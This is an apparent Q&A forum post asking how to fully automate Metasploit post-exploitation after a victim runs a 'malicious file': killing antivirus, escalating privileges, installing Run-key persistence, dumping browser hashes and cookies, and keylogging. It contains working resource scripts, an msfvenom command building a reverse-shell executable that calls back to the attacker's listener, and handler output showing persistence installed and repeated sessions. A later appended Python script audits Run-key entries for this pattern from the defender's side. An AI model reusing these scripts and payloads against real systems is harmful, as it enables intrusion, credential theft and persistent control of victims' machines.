How to fully automate Metasploit?

user3391185
August 9, 2021 at 06:29

I want to fully automate the work of the 'multi/handler' module in Metasploit after my malicious file is launched.

  1. Acquire SYSTEM privileges
  2. Disable the antivirus
  3. Add to autostart
  4. Dump all hashes and cookies from the browsers
  5. Run a keylogger

These tasks should run automatically for every new session obtained by 'multi/handler'. Here is how I am trying, but as a result I get a lot of sessions (without SYSTEM), and after a reboot my session does not come back!!

Example:

run.rc

use exploit/multi/handler
set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set VERBOSE true
set LHOST 192.168.1.67
set LPORT 4444
exploit -jz

cmd.rc

run post/windows/manage/killav
run post/windows/gather/checkvm
run post/windows/manage/priv_migrate
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe

Start the server:

msfconsole -r ./run.rc

Generate the binary:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 -f exe > shell.exe

OUTPUT:

[*] Session ID 1 (192.168.1.67:4444 -> 192.168.1.30:49316) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*]     Running command run post/windows/manage/killav
[*] No target processes were found.
[*]     Running command run post/windows/gather/checkvm
[*] Checking if USER- is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*]     Running command run post/windows/manage/priv_migrate
[*] Current session process is shell.exe (1452) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2776)
[+] Successfully migrated to Explorer.EXE (2776) as: user-ПК\user
[*]     Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[+] Agent executed with PID 2260
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ctcAjhNAtgC
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ctcAjhNAtgC
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-_20210808.3043/USER-_20210808.3043.rc
[*] Meterpreter session 2 opened (192.168.1.67:4444 -> 192.168.1.30:49318) at 2021-08-08 15:30:43 -0400
[*] Session ID 2 (192.168.1.67:4444 -> 192.168.1.30:49318) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
[*] Running Command List ...
[*]     Running command run post/windows/manage/killav
[*] No target processes were found.
[*]     Running command run post/windows/gather/checkvm
[*] Checking if USER- is a Virtual Machine ...
[+] This is a VirtualBox Virtual Machine
[*]     Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2260) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2776)
[+] Successfully migrated to Explorer.EXE (2776) as: user-ПК\user
[*]     Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information           Connection
  --  ----  ----                     -----------           ----------
  1         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49316 (192.168.1.30)
  2         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49318 (192.168.1.30)
  3         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49319 (192.168.1.30)
  4         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49321 (192.168.1.30)
  5         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49323 (192.168.1.30)
  6         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49325 (192.168.1.30)
  7         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49326 (192.168.1.30)
  8         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49328 (192.168.1.30)
  9         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49329 (192.168.1.30)
  10        meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49331 (192.168.1.30)
  11        meterpreter x86/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49333 (192.168.1.30)

msf5 exploit(multi/handler) >

I keep getting a huge number of sessions (I keep creating them non-stop).
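The handler output above leaves a very recognisable host artifact: a value with a random-looking name under HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points at an executable dropped in the user's Temp directory, re-written on every new session. The following audit script is an added example from the defender's side, not part of the question or of Metasploit; it flags Run-key entries whose image lives in a scratch directory or whose value name looks machine-generated. The sample entries, the directory list and the randomness heuristic are constructed for this example; `load_hkcu_run` reads the real key with the standard `winreg` module and is only usable on a Windows host.

```python
import re
from typing import Dict, List

# Constructed sample of HKCU\...\Run values: two ordinary entries plus one modelled
# on the persistence entry visible in the handler output (ctcAjhNAtgC -> %TEMP%\default.exe).
SAMPLE_RUN_ENTRIES: Dict[str, str] = {
    "OneDrive": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "ctcAjhNAtgC": r"C:\Users\user\AppData\Local\Temp\default.exe",
    "Discord": r"C:\Users\user\AppData\Local\Discord\Update.exe --processStart Discord.exe",
}

# Directories a legitimate autostart binary rarely lives in (assumption: tune per estate).
SUSPICIOUS_DIR_FRAGMENTS = (
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\users\\public\\",
    "\\downloads\\",
)


def image_path(command: str) -> str:
    """Extract the executable path from a Run value, quoted or unquoted."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    # Unquoted: take everything up to the first ".exe" followed by whitespace or end of string.
    match = re.match(r"(.*?\.exe)(\s|$)", command, re.IGNORECASE)
    return match.group(1) if match else command.split()[0]


def looks_random(name: str) -> bool:
    """Heuristic for machine-generated value names: few vowels or many case flips."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8 or not name.isalnum():
        return False  # short or punctuated names are too ambiguous to score
    vowels = sum(c.lower() in "aeiou" for c in letters)
    case_flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return vowels / len(letters) < 0.25 or case_flips >= 4


def audit_run_entries(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Return {value_name: [reasons]} for every entry that trips a heuristic."""
    findings: Dict[str, List[str]] = {}
    for name, command in entries.items():
        reasons = []
        path = image_path(command).lower()
        if any(fragment in path for fragment in SUSPICIOUS_DIR_FRAGMENTS):
            reasons.append("image lives in a temp/user-writable scratch directory")
        if looks_random(name):
            reasons.append("value name looks machine-generated")
        if reasons:
            findings[name] = reasons
    return findings


def load_hkcu_run() -> Dict[str, str]:
    """Read the live HKCU Run key on a Windows host (winreg is Windows-only)."""
    import winreg

    entries: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once the index runs past the last value
                break
            entries[name] = str(value)
            index += 1
    return entries


if __name__ == "__main__":
    for value_name, reasons in audit_run_entries(SAMPLE_RUN_ENTRIES).items():
        print(f"{value_name}: {'; '.join(reasons)}")
```

Run against the constructed sample only the `ctcAjhNAtgC` entry is reported, for both reasons. The heuristics are deliberately simple; in practice you would pair them with the binary's signature status and creation time, and watch for the same key being rewritten repeatedly, which is exactly the pattern the output above produces.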


Answers (0)